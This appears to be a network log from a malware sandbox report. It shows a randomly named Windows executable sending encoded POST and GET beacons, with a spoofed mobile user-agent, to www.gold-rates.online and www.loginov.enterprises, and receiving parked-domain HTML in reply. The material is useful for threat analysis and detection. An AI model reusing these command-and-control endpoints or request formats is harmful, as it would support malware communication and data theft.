                                                                                                                                Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 7a 77 68 36 7a 47 61 69 52 5a 2b 77 70 73 62 71 57 74 4c 58 68 4c 66 4f 4d 7a 77 54 47 31 61 73 2f 36 32 75 4d 6d 61 43 77 45 46 71 30 68 32 76 43 41 72 4e 5a 54 4a 69 4a 61 54 48 67 48 67 79 4e 76 6a 45 55 65 54 47 49 55 56 67 4d 64 78 64 39 79 47 64 74 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                                                                Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_zwh6zGaiRZ+wpsbqWtLXhLfOMzwTG1as/62uMmaCwEFq0h2vCArNZTJiJaTHgHgyNvjEUeTGIUVgMdxd9yGdtw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                                                                                Oct 29, 2024 16:54:24.627605915 CET | 591 | IN | Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                                                                                Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNGU4MGFhOTUtZmJjOS00NjM3LTgzYmEtNGViMTk5YWM4MDZiIiwicGFnZV90aW1lIjoxNzMwMjE3Mj


                                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                2 | 192.168.2.8 | 49710 | 199.59.243.227 | 80 | 5072 | C:\Program Files (x86)\OFtyZipvaoDSZWmBUsqGFRTWDyGOJtFBZOTWXZxUYCoQWHLDIwMNvCJLSZCxJBUIefvvKSYLE\XORjEgwNIUb.exe
                                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                                Oct 29, 2024 16:54:26.527187109 CET | 713 | OUT | POST /026w/ HTTP/1.1
                                                                                                                                Host: www.gold-rates.online
                                                                                                                                Accept: */*
                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                Origin: http://www.gold-rates.online
                                                                                                                                Referer: http://www.gold-rates.online/026w/
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Connection: close
                                                                                                                                Content-Length: 224
                                                                                                                                User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36
                                                                                                                                Data Raw: 65 64 44 3d 6f 61 49 6d 66 61 75 31 2f 39 7a 5a 7a 4c 74 4c 45 44 5a 54 4c 72 43 46 62 46 7a 55 66 4c 6a 6e 37 73 2b 4b 6d 33 42 65 6d 2f 36 7a 70 52 58 44 4a 49 35 38 58 49 32 48 4f 38 75 55 76 32 58 66 69 33 6a 38 68 53 55 41 41 6d 4e 6d 6e 66 31 58 42 4d 67 66 4a 49 65 59 56 2f 6f 44 33 30 66 43 63 79 36 30 6e 35 7a 66 77 78 5a 56 53 2b 67 57 6f 47 38 42 32 79 67 53 38 7a 6c 56 4b 4a 53 57 50 55 6f 68 6a 5a 62 73 37 52 4b 55 75 6c 66 4b 57 6c 7a 50 59 6c 57 6a 35 6f 59 4e 56 56 58 35 70 2f 36 59 53 6e 6d 55 58 35 5a 48 2f 5a 4c 2b 2f 4d 47 41 65 48 53 38 2f 44 6c 2b 53 35 52 50 6f 5a 54 65 30 4c 75 74 35 36 4e 6d 76 32 62 6b 49 38 4f 74 71 61 31 66 4d 37 2b 6d
                                                                                                                                Data Ascii: edD=oaImfau1/9zZzLtLEDZTLrCFbFzUfLjn7s+Km3Bem/6zpRXDJI58XI2HO8uUv2Xfi3j8hSUAAmNmnf1XBMgfJIeYV/oD30fCcy60n5zfwxZVS+gWoG8B2ygS8zlVKJSWPUohjZbs7RKUulfKWlzPYlWj5oYNVVX5p/6YSnmUX5ZH/ZL+/MGAeHS8/Dl+S5RPoZTe0Lut56Nmv2bkI8Otqa1fM7+m
                                                                                                                                Oct 29, 2024 16:54:27.136584997 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                                                                                date: Tue, 29 Oct 2024 15:54:26 GMT
                                                                                                                                content-type: text/html; charset=utf-8
                                                                                                                                content-length: 1138
                                                                                                                                x-request-id: d0f44dc0-70f4-4e11-9d25-557e209ab35e
                                                                                                                                cache-control: no-store, max-age=0
                                                                                                                                accept-ch: sec-ch-prefers-color-scheme
                                                                                                                                critical-ch: sec-ch-prefers-color-scheme
                                                                                                                                vary: sec-ch-prefers-color-scheme
                                                                                                                                x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_zwh6zGaiRZ+wpsbqWtLXhLfOMzwTG1as/62uMmaCwEFq0h2vCArNZTJiJaTHgHgyNvjEUeTGIUVgMdxd9yGdtw==
                                                                                                                                set-cookie: parking_session=d0f44dc0-70f4-4e11-9d25-557e209ab35e; expires=Tue, 29 Oct 2024 16:09:27 GMT; path=/
                                                                                                                                connection: close
                                                                                                                                Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 7a 77 68 36 7a 47 61 69 52 5a 2b 77 70 73 62 71 57 74 4c 58 68 4c 66 4f 4d 7a 77 54 47 31 61 73 2f 36 32 75 4d 6d 61 43 77 45 46 71 30 68 32 76 43 41 72 4e 5a 54 4a 69 4a 61 54 48 67 48 67 79 4e 76 6a 45 55 65 54 47 49 55 56 67 4d 64 78 64 39 79 47 64 74 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                                                                Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_zwh6zGaiRZ+wpsbqWtLXhLfOMzwTG1as/62uMmaCwEFq0h2vCArNZTJiJaTHgHgyNvjEUeTGIUVgMdxd9yGdtw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                                                                                Oct 29, 2024 16:54:27.136610031 CET | 591 | IN | Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                                                                                Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiZDBmNDRkYzAtNzBmNC00ZTExLTlkMjUtNTU3ZTIwOWFiMzVlIiwicGFnZV90aW1lIjoxNzMwMjE3Mj


                                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                3 | 192.168.2.8 | 49711 | 199.59.243.227 | 80 | 5072 | C:\Program Files (x86)\OFtyZipvaoDSZWmBUsqGFRTWDyGOJtFBZOTWXZxUYCoQWHLDIwMNvCJLSZCxJBUIefvvKSYLE\XORjEgwNIUb.exe
                                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                                Oct 29, 2024 16:54:29.080543041 CET | 1730 | OUT | POST /026w/ HTTP/1.1
                                                                                                                                Host: www.gold-rates.online
                                                                                                                                Accept: */*
                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                Origin: http://www.gold-rates.online
                                                                                                                                Referer: http://www.gold-rates.online/026w/
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Connection: close
                                                                                                                                Content-Length: 1240
                                                                                                                                User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36
                                                                                                                                Data Raw: 65 64 44 3d 6f 61 49 6d 66 61 75 31 2f 39 7a 5a 7a 4c 74 4c 45 44 5a 54 4c 72 43 46 62 46 7a 55 66 4c 6a 6e 37 73 2b 4b 6d 33 42 65 6d 2f 43 7a 70 69 66 44 62 5a 35 38 55 49 32 48 53 73 75 4a 76 32 58 47 69 33 72 6e 68 53 5a 69 41 6b 46 6d 6e 38 4e 58 4a 66 34 66 51 34 65 59 4b 76 6f 47 34 55 65 41 63 79 71 34 6e 35 6a 66 77 78 5a 56 53 38 49 57 68 33 38 42 30 79 67 52 78 6a 6c 5a 41 70 53 79 50 51 45 78 6a 5a 66 57 37 68 71 55 75 46 50 4b 46 44 76 50 58 6c 57 32 36 6f 5a 51 56 56 62 6d 70 2f 58 6a 53 6d 53 2b 58 35 52 48 39 75 79 58 67 4f 79 61 4c 46 48 58 2b 55 31 44 63 59 46 2b 68 35 43 71 35 4b 2b 37 2f 64 39 30 67 56 6e 2f 4c 4d 37 53 78 63 64 35 41 74 33 79 38 46 38 41 6b 2f 65 54 56 71 34 58 72 47 32 49 66 30 4b 58 78 6f 32 2b 53 2b 6a 37 51 4a 6c 58 54 68 31 5a 61 56 61 46 4e 61 74 32 30 70 53 51 35 41 6c 54 4c 66 54 35 38 6e 74 45 75 31 6c 36 69 61 4b 2b 32 5a 54 76 38 36 53 41 74 32 32 38 49 38 56 35 57 2b 48 6b 57 59 78 55 6d 66 39 47 79 45 72 37 79 6e 32 47 41 59 62 35 75 6f 4c 4c 71 6a [TRUNCATED]
                                                                                                                                Data Ascii: edD= [TRUNCATED]
                                                                                                                                Oct 29, 2024 16:54:29.775293112 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                                                                                date: Tue, 29 Oct 2024 15:54:28 GMT
                                                                                                                                content-type: text/html; charset=utf-8
                                                                                                                                content-length: 1138
                                                                                                                                x-request-id: 6cc9662f-02f8-4ef6-acf8-bd137c170662
                                                                                                                                cache-control: no-store, max-age=0
                                                                                                                                accept-ch: sec-ch-prefers-color-scheme
                                                                                                                                critical-ch: sec-ch-prefers-color-scheme
                                                                                                                                vary: sec-ch-prefers-color-scheme
                                                                                                                                x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_zwh6zGaiRZ+wpsbqWtLXhLfOMzwTG1as/62uMmaCwEFq0h2vCArNZTJiJaTHgHgyNvjEUeTGIUVgMdxd9yGdtw==
                                                                                                                                set-cookie: parking_session=6cc9662f-02f8-4ef6-acf8-bd137c170662; expires=Tue, 29 Oct 2024 16:09:29 GMT; path=/
                                                                                                                                connection: close
                                                                                                                                Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 7a 77 68 36 7a 47 61 69 52 5a 2b 77 70 73 62 71 57 74 4c 58 68 4c 66 4f 4d 7a 77 54 47 31 61 73 2f 36 32 75 4d 6d 61 43 77 45 46 71 30 68 32 76 43 41 72 4e 5a 54 4a 69 4a 61 54 48 67 48 67 79 4e 76 6a 45 55 65 54 47 49 55 56 67 4d 64 78 64 39 79 47 64 74 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                                                                Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_zwh6zGaiRZ+wpsbqWtLXhLfOMzwTG1as/62uMmaCwEFq0h2vCArNZTJiJaTHgHgyNvjEUeTGIUVgMdxd9yGdtw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                                                                                Oct 29, 2024 16:54:29.775329113 CET | 591 | IN | Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                                                                                Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNmNjOTY2MmYtMDJmOC00ZWY2LWFjZjgtYmQxMzdjMTcwNjYyIiwicGFnZV90aW1lIjoxNzMwMjE3Mj


                                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                4 | 192.168.2.8 | 49712 | 199.59.243.227 | 80 | 5072 | C:\Program Files (x86)\OFtyZipvaoDSZWmBUsqGFRTWDyGOJtFBZOTWXZxUYCoQWHLDIwMNvCJLSZCxJBUIefvvKSYLE\XORjEgwNIUb.exe
                                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                                Oct 29, 2024 16:54:31.684633017 CET | 432 | OUT | GET /026w/?edD=lYgGcuisybLP7Ls1fGp6HIm4b0bJG5Li1NyGnRgJosPR9gPGPpYXP8moMcmegmveynv5+gYGX20ShvoOLspZRc66KMIi0XTCODv4m7XI1igXQNISi3YQnFgtoSZ+M/H7bQ==&mRR=Vxudf0fHzLw84n3P HTTP/1.1
                                                                                                                                Host: www.gold-rates.online
                                                                                                                                Accept: */*
                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                Connection: close
                                                                                                                                User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36
                                                                                                                                Oct 29, 2024 16:54:32.301740885 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                                                                                date: Tue, 29 Oct 2024 15:54:32 GMT
                                                                                                                                content-type: text/html; charset=utf-8
                                                                                                                                content-length: 1518
                                                                                                                                x-request-id: f3f876fe-0043-4ce5-bcfc-28b4e04dd891
                                                                                                                                cache-control: no-store, max-age=0
                                                                                                                                accept-ch: sec-ch-prefers-color-scheme
                                                                                                                                critical-ch: sec-ch-prefers-color-scheme
                                                                                                                                vary: sec-ch-prefers-color-scheme
                                                                                                                                x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_XJQvAijUTrGtEbmNM2WTsLIDFSMgXD6Zg3wwukdEa+jCT9n3F/GXjYoF9DU8j0VaKGxm+P77pKM3kjS+diTSLQ==
                                                                                                                                set-cookie: parking_session=f3f876fe-0043-4ce5-bcfc-28b4e04dd891; expires=Tue, 29 Oct 2024 16:09:32 GMT; path=/
                                                                                                                                connection: close
                                                                                                                                Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 58 4a 51 76 41 69 6a 55 54 72 47 74 45 62 6d 4e 4d 32 57 54 73 4c 49 44 46 53 4d 67 58 44 36 5a 67 33 77 77 75 6b 64 45 61 2b 6a 43 54 39 6e 33 46 2f 47 58 6a 59 6f 46 39 44 55 38 6a 30 56 61 4b 47 78 6d 2b 50 37 37 70 4b 4d 33 6b 6a 53 2b 64 69 54 53 4c 51 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                                                                Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_XJQvAijUTrGtEbmNM2WTsLIDFSMgXD6Zg3wwukdEa+jCT9n3F/GXjYoF9DU8j0VaKGxm+P77pKM3kjS+diTSLQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                                                                                Oct 29, 2024 16:54:32.302568913 CET | 971 | IN | Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                                                                                Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiZjNmODc2ZmUtMDA0My00Y2U1LWJjZmMtMjhiNGUwNGRkODkxIiwicGFnZV90aW1lIjoxNzMwMjE3Mj


                                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                5 | 192.168.2.8 | 49713 | 3.33.130.190 | 80 | 5072 | C:\Program Files (x86)\OFtyZipvaoDSZWmBUsqGFRTWDyGOJtFBZOTWXZxUYCoQWHLDIwMNvCJLSZCxJBUIefvvKSYLE\XORjEgwNIUb.exe
                                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                                Oct 29, 2024 16:54:37.888039112 CET | 699 | OUT | POST /b8ns/ HTTP/1.1
                                                                                                                                Host: www.loginov.enterprises
                                                                                                                                Accept: */*
                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                Origin: http://www.loginov.enterprises
                                                                                                                                Referer: http://www.loginov.enterprises/b8ns/
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Connection: close
                                                                                                                                Content-Length: 204
                                                                                                                                User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36
                                                                                                                                Data Raw: 65 64 44 3d 4e 46 45 7a 31 54 59 4d 31 39 36 56 6a 57 55 34 66 42 2b 4c 50 70 76 58 39 63 75 4f 4b 67 53 2f 6f 38 75 51 6d 4f 54 77 57 71 6d 59 35 71 4f 54 6b 41 61 35 67 77 46 6a 41 63 4f 49 35 56 72 42 63 35 6c 75 4b 34 72 7a 74 63 75 7a 6d 76 78 6d 6e 50 47 4c 36 70 45 62 43 67 36 7a 74 79 56 6e 4a 5a 42 32 72 64 2b 67 36 5a 61 4b 4b 2f 71 46 6c 37 79 57 6b 65 74 63 33 76 64 6e 30 74 75 65 74 36 67 47 4d 71 34 4e 46 66 4c 63 71 65 6e 37 76 4c 34 38 56 78 49 36 63 71 70 77 74 35 51 76 33 49 50 34 46 51 36 72 49 34 58 44 70 54 56 54 66 79 30 56 79 35 4e 2b 36 54 63 58 38 68 64 63 57 51 4a 35 79 6e 4d 3d
                                                                                                                                Data Ascii: edD=NFEz1TYM196VjWU4fB+LPpvX9cuOKgS/o8uQmOTwWqmY5qOTkAa5gwFjAcOI5VrBc5luK4rztcuzmvxmnPGL6pEbCg6ztyVnJZB2rd+g6ZaKK/qFl7yWketc3vdn0tuet6gGMq4NFfLcqen7vL48VxI6cqpwt5Qv3IP4FQ6rI4XDpTVTfy0Vy5N+6TcX8hdcWQJ5ynM=


                                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                6 | 192.168.2.8 | 49714 | 3.33.130.190 | 80 | 5072 | C:\Program Files (x86)\OFtyZipvaoDSZWmBUsqGFRTWDyGOJtFBZOTWXZxUYCoQWHLDIwMNvCJLSZCxJBUIefvvKSYLE\XORjEgwNIUb.exe
                                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                                Oct 29, 2024 16:54:40.472532988 CET | 719 | OUT | POST /b8ns/ HTTP/1.1
                                                                                                                                Host: www.loginov.enterprises
                                                                                                                                Accept: */*
                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                Origin: http://www.loginov.enterprises
                                                                                                                                Referer: http://www.loginov.enterprises/b8ns/
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Connection: close
                                                                                                                                Content-Length: 224
                                                                                                                                User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36
                                                                                                                                Data Raw: 65 64 44 3d 4e 46 45 7a 31 54 59 4d 31 39 36 56 69 32 45 34 45 6a 57 4c 49 4a 76 55 32 38 75 4f 42 41 53 37 6f 38 69 51 6d 4c 7a 61 52 66 32 59 35 49 6d 54 6c 42 61 35 6c 77 46 6a 4c 38 4f 33 6d 6c 72 65 63 35 68 6d 4b 39 44 7a 74 59 47 7a 6d 75 42 6d 6d 2b 47 4d 36 35 45 5a 62 77 36 4c 79 69 56 6e 4a 5a 42 32 72 64 72 31 36 5a 43 4b 4c 4f 36 46 6b 61 79 56 69 75 74 66 77 76 64 6e 77 74 76 56 74 36 67 6f 4d 72 6b 72 46 61 48 63 71 66 58 37 76 35 51 37 4d 42 4a 51 59 71 6f 39 74 35 74 78 39 62 44 76 65 7a 43 6e 55 65 6e 69 6c 46 6b 35 46 51 38 54 78 35 6c 56 36 51 30 68 35 57 41 30 4d 7a 5a 4a 73 77 59 58 47 5a 33 48 64 79 70 6d 4e 61 4c 6a 75 42 31 69 50 71 45 79
                                                                                                                                Data Ascii: edD=NFEz1TYM196Vi2E4EjWLIJvU28uOBAS7o8iQmLzaRf2Y5ImTlBa5lwFjL8O3mlrec5hmK9DztYGzmuBmm+GM65EZbw6LyiVnJZB2rdr16ZCKLO6FkayViutfwvdnwtvVt6goMrkrFaHcqfX7v5Q7MBJQYqo9t5tx9bDvezCnUenilFk5FQ8Tx5lV6Q0h5WA0MzZJswYXGZ3HdypmNaLjuB1iPqEy


                                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                7 | 192.168.2.8 | 49715 | 3.33.130.190 | 80 | 5072 | C:\Program Files (x86)\OFtyZipvaoDSZWmBUsqGFRTWDyGOJtFBZOTWXZxUYCoQWHLDIwMNvCJLSZCxJBUIefvvKSYLE\XORjEgwNIUb.exe
                                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                                Oct 29, 2024 16:54:43.068149090 CET | 1736 | OUT | POST /b8ns/ HTTP/1.1
                                                                                                                                Host: www.loginov.enterprises
                                                                                                                                Accept: */*
                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                Origin: http://www.loginov.enterprises
                                                                                                                                Referer: http://www.loginov.enterprises/b8ns/
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Connection: close
                                                                                                                                Content-Length: 1240
                                                                                                                                User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36
